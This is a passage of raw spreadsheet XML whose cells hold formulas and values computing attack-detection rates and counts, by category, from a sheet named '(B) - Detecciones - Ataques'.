        <v>0.4</v>
      </c>
      <c r="BC22" s="667">
        <f>IF(BC17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC21))</f>
        <v>0.4997100329</v>
      </c>
      <c r="BD22" s="667" t="str">
        <f>IF(BD17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD21))</f>
        <v>-</v>
      </c>
      <c r="BE22" s="667" t="str">
        <f>IF(BE17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE21))</f>
        <v>-</v>
      </c>
      <c r="BF22" s="667">
        <f>IF(BF17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF21))</f>
        <v>1</v>
      </c>
      <c r="BG22" s="667" t="str">
        <f>IF(BG17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG21))</f>
        <v>-</v>
      </c>
      <c r="BH22" s="667">
        <f>IF(BH17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH21))</f>
        <v>0</v>
      </c>
      <c r="BI22" s="667">
        <f>IF(BI17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI21))</f>
        <v>0</v>
      </c>
      <c r="BJ22" s="667" t="str">
        <f>IF(BJ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ21))</f>
        <v>-</v>
      </c>
      <c r="BK22" s="667">
        <f>IF(BK17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK21))</f>
        <v>0</v>
      </c>
      <c r="BL22" s="667">
        <f>IF(BL17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL21))</f>
        <v>1</v>
      </c>
      <c r="BM22" s="667" t="str">
        <f>IF(BM17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM21))</f>
        <v>-</v>
      </c>
      <c r="BN22" s="667">
        <f>IF(BN17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN21))</f>
        <v>1</v>
      </c>
      <c r="BO22" s="667">
        <f>IF(BO17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO21))</f>
        <v>0</v>
      </c>
      <c r="BP22" s="667" t="str">
        <f>IF(BP17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP21))</f>
        <v>-</v>
      </c>
      <c r="BQ22" s="667">
        <f>IF(BQ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ21))</f>
        <v>1</v>
      </c>
      <c r="BR22" s="667">
        <f>IF(BR17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR21))</f>
        <v>0</v>
      </c>
      <c r="BS22" s="667">
        <f>IF(BS17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS21))</f>
        <v>1</v>
      </c>
      <c r="BT22" s="667" t="str">
        <f>IF(BT17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT21))</f>
        <v>-</v>
      </c>
      <c r="BU22" s="667">
        <f>IF(BU17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU21))</f>
        <v>0</v>
      </c>
      <c r="BV22" s="667">
        <f>IF(BV17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV21))</f>
        <v>0</v>
      </c>
      <c r="BW22" s="667">
        <f>IF(BW17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW21))</f>
        <v>0</v>
      </c>
      <c r="BX22" s="667">
        <f>IF(BX17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX21))</f>
        <v>1</v>
      </c>
      <c r="BY22" s="667">
        <f>IF(BY17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY21))</f>
        <v>0</v>
      </c>
      <c r="BZ22" s="667">
        <f>IF(BZ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ21))</f>
        <v>1</v>
      </c>
      <c r="CA22" s="667" t="str">
        <f>IF(CA17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA21))</f>
        <v>-</v>
      </c>
      <c r="CB22" s="667">
        <f>IF(CB17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB21))</f>
        <v>1</v>
      </c>
      <c r="CC22" s="667">
        <f>IF(CC17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC21))</f>
        <v>1</v>
      </c>
      <c r="CD22" s="667">
        <f>IF(CD17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD21))</f>
        <v>1</v>
      </c>
      <c r="CE22" s="667">
        <f>IF(CE17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE21))</f>
        <v>0</v>
      </c>
      <c r="CF22" s="667">
        <f>IF(CF17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF21))</f>
        <v>1</v>
      </c>
      <c r="CG22" s="667" t="str">
        <f>IF(CG17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG21))</f>
        <v>-</v>
      </c>
      <c r="CH22" s="667">
        <f>IF(CH17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH21))</f>
        <v>0.9920891937</v>
      </c>
      <c r="CI22" s="667">
        <f>IF(CI17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI21))</f>
        <v>0</v>
      </c>
      <c r="CJ22" s="667" t="str">
        <f>IF(CJ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ21))</f>
        <v>-</v>
      </c>
      <c r="CK22" s="667">
        <f>IF(CK17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK21))</f>
        <v>0</v>
      </c>
      <c r="CL22" s="667" t="str">
        <f>IF(CL17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL21))</f>
        <v>-</v>
      </c>
      <c r="CM22" s="667">
        <f>IF(CM17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM21))</f>
        <v>0</v>
      </c>
      <c r="CN22" s="667">
        <f>IF(CN17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN21))</f>
        <v>1</v>
      </c>
      <c r="CO22" s="667" t="str">
        <f>IF(CO17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO21))</f>
        <v>-</v>
      </c>
      <c r="CP22" s="667" t="str">
        <f>IF(CP17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP21))</f>
        <v>-</v>
      </c>
      <c r="CQ22" s="667" t="str">
        <f>IF(CQ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ21))</f>
        <v>-</v>
      </c>
      <c r="CR22" s="667" t="str">
        <f>IF(CR17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR21))</f>
        <v>-</v>
      </c>
      <c r="CS22" s="667">
        <f>IF(CS17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS21))</f>
        <v>0</v>
      </c>
      <c r="CT22" s="667">
        <f>IF(CT17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT21))</f>
        <v>0</v>
      </c>
      <c r="CU22" s="667">
        <f>IF(CU17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU21))</f>
        <v>0</v>
      </c>
      <c r="CV22" s="667" t="str">
        <f>IF(CV17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV21))</f>
        <v>-</v>
      </c>
      <c r="CW22" s="667">
        <f>IF(CW17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW21))</f>
        <v>1</v>
      </c>
      <c r="CX22" s="667">
        <f>IF(CX17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX21))</f>
        <v>1</v>
      </c>
      <c r="CY22" s="667">
        <f>IF(CY17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY21))</f>
        <v>0.09090909091</v>
      </c>
      <c r="CZ22" s="368"/>
      <c r="DA22" s="368"/>
      <c r="DB22" s="368"/>
      <c r="DC22" s="368"/>
      <c r="DD22" s="669" t="s">
        <v>558</v>
      </c>
      <c r="DE22" s="746">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>13</v>
      </c>
      <c r="DF22" s="747">
        <v>12.0</v>
      </c>
      <c r="DG22" s="337">
        <f t="shared" ref="DG22:DG23" si="21">DF22/DE22</f>
        <v>0.9230769231</v>
      </c>
      <c r="DH22" s="719">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="DI22" s="720">
        <f t="shared" ref="DI22:DI23" si="22">1-DG22</f>
        <v>0.07692307692</v>
      </c>
      <c r="DJ22" s="748">
        <v>0.0</v>
      </c>
      <c r="DK22" s="749"/>
      <c r="DL22" s="749">
        <v>0.0</v>
      </c>
      <c r="DM22" s="749">
        <v>12.0</v>
      </c>
      <c r="DN22" s="336">
        <f t="shared" si="12"/>
        <v>0.9230769231</v>
      </c>
      <c r="DO22" s="336">
        <f t="shared" si="13"/>
        <v>0.07692307692</v>
      </c>
      <c r="DP22" s="750">
        <f t="shared" si="14"/>
        <v>12</v>
      </c>
      <c r="DR22" s="610"/>
      <c r="DS22" s="610"/>
      <c r="DT22" s="671" t="s">
        <v>558</v>
      </c>
      <c r="DU22" s="612">
        <f>DF22/'(D) - Análisis Resultados I - S'!EB41</f>
        <v>6</v>
      </c>
      <c r="DV22" s="368"/>
      <c r="DW22" s="671" t="s">
        <v>558</v>
      </c>
      <c r="DX22" s="612">
        <f>DF22/DE22</f>
        <v>0.9230769231</v>
      </c>
      <c r="DY22" s="722">
        <v>0.0</v>
      </c>
      <c r="DZ22" s="722"/>
      <c r="EA22" s="722"/>
      <c r="EE22" s="636" t="s">
        <v>664</v>
      </c>
      <c r="EF22" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG22" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH22" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI22" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ22" s="336"/>
      <c r="EK22" s="336"/>
      <c r="EL22" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP13&lt;&gt;0,'(B) - Detecciones - Ataques'!IP13*'(B) - Detecciones - Ataques'!IL13/('(B) - Detecciones - Ataques'!IL13+'(B) - Detecciones - Ataques'!IN13),0)</f>
        <v>0</v>
      </c>
      <c r="EM22" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP13&lt;&gt;0,'(B) - Detecciones - Ataques'!IP13*'(B) - Detecciones - Ataques'!IN13/('(B) - Detecciones - Ataques'!IL13+'(B) - Detecciones - Ataques'!IN13),0)</f>
        <v>0</v>
      </c>
      <c r="EN22" s="626"/>
      <c r="EO22" s="626"/>
      <c r="EP22" s="729"/>
      <c r="EQ22" s="730"/>
      <c r="ER22" s="731" t="s">
        <v>357</v>
      </c>
      <c r="ES22" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER22 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="ET22" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER22 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EU22" s="728">
        <f t="shared" si="16"/>
        <v>0.8</v>
      </c>
      <c r="EV22" s="730"/>
      <c r="EW22" s="732"/>
      <c r="EX22" s="730"/>
      <c r="EY22" s="730"/>
      <c r="EZ22" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="FA22" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ22)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ22 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ22 &amp; "*"))</f>
        <v>0.6710071942</v>
      </c>
      <c r="FB22" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ22)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ22 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ22 &amp; "*"))</f>
        <v>0.8333333333</v>
      </c>
      <c r="FC22" s="621"/>
      <c r="FD22" s="403"/>
      <c r="FE22" s="403"/>
      <c r="FF22" s="403"/>
      <c r="FG22" s="403"/>
      <c r="FH22" s="751" t="s">
        <v>2679</v>
      </c>
      <c r="FI22" s="752" t="s">
        <v>2455</v>
      </c>
      <c r="FJ22" s="752" t="s">
        <v>2456</v>
      </c>
      <c r="FK22" s="20"/>
      <c r="FL22" s="20"/>
      <c r="FM22" s="20"/>
      <c r="FN22" s="20"/>
      <c r="FO22" s="20"/>
      <c r="FP22" s="20"/>
      <c r="FQ22" s="403" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB")</f>
        <v>SMB</v>
      </c>
      <c r="FR22" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ22)</f>
        <v>1</v>
      </c>
      <c r="FS22" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ22)</f>
        <v>1</v>
      </c>
      <c r="FT22" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ22)</f>
        <v>1</v>
      </c>
      <c r="FU22" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ22)</f>
        <v>1</v>
      </c>
    </row>
    <row r="23">
      <c r="D23" s="173"/>
      <c r="E23" s="173"/>
      <c r="DD23" s="753" t="s">
        <v>2413</v>
      </c>
      <c r="DE23" s="680">
        <f t="shared" ref="DE23:DF23" si="20">SUM(DE9:DE22)</f>
        <v>244</v>
      </c>
      <c r="DF23" s="680">
        <f t="shared" si="20"/>
        <v>177</v>
      </c>
      <c r="DG23" s="679">
        <f t="shared" si="21"/>
        <v>0.7254098361</v>
      </c>
      <c r="DH23" s="754">
        <f t="shared" si="10"/>
        <v>67</v>
      </c>
      <c r="DI23" s="696">
        <f t="shared" si="22"/>
        <v>0.2745901639</v>
      </c>
      <c r="DJ23" s="680">
        <f>SUM(DJ9:DJ22)</f>
        <v>22</v>
      </c>
      <c r="DK23" s="749"/>
      <c r="DL23" s="749">
        <v>0.0</v>
      </c>
      <c r="DM23" s="755">
        <f>SUM(DM9:DM22)</f>
        <v>212</v>
      </c>
      <c r="DN23" s="756">
        <f t="shared" si="12"/>
        <v>0.868852459</v>
      </c>
      <c r="DO23" s="679">
        <f t="shared" si="13"/>
        <v>0.131147541</v>
      </c>
      <c r="DP23" s="680">
        <f>SUM(DP9:DP22)</f>
        <v>199</v>
      </c>
      <c r="DQ23" s="383"/>
      <c r="DY23" s="757">
        <v>0.9230769230769231</v>
      </c>
      <c r="EE23" s="636" t="s">
        <v>357</v>
      </c>
      <c r="EF23" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG23" s="69" t="str">
